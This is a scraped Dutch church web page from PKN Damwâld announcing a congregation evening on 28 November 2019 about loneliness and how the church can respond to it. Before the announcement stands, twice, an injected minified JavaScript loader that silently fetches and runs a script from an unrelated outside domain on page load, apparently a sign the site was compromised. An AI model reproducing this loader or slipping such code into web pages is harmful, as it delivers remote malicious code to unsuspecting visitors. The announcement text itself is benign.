;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Welkom op de gemeenteavond in De Ontmoeting - PKN Damwâld

Welkom op de gemeenteavond in De Ontmoeting

Gepubliceerd op: maandag 25 november 2019

Van harte welkom op de gemeenteavond (28 november, om half acht ’s avonds).  Deze avond is bedoeld om te delen hoe de kerk reilt en zeilt en om als gemeente samen te kunnen praten / denken over lopende zaken en een actueel thema.

Deze keer willen we het thema ‘eenzaamheid’ behandelen; Robert Colijn is gevraagd dit thema voor te bereiden, met als insteek hoe je als kerk hieraan aandacht kunt geven en ook maatschappelijk een rol kunt vervullen. Eenzaamheid komt voor in alle lagen van de bevolking en in alle leeftijdsgroepen; pastoraal en diaconaal zou de kerk daarin iets kunnen en moeten doen om te helpen. Een boeiend en dringend onderwerp. We hoen dat jullie hier samen met ons als kerkenraad eens over van gedachten willen wisselen. Samen maken we het verschil!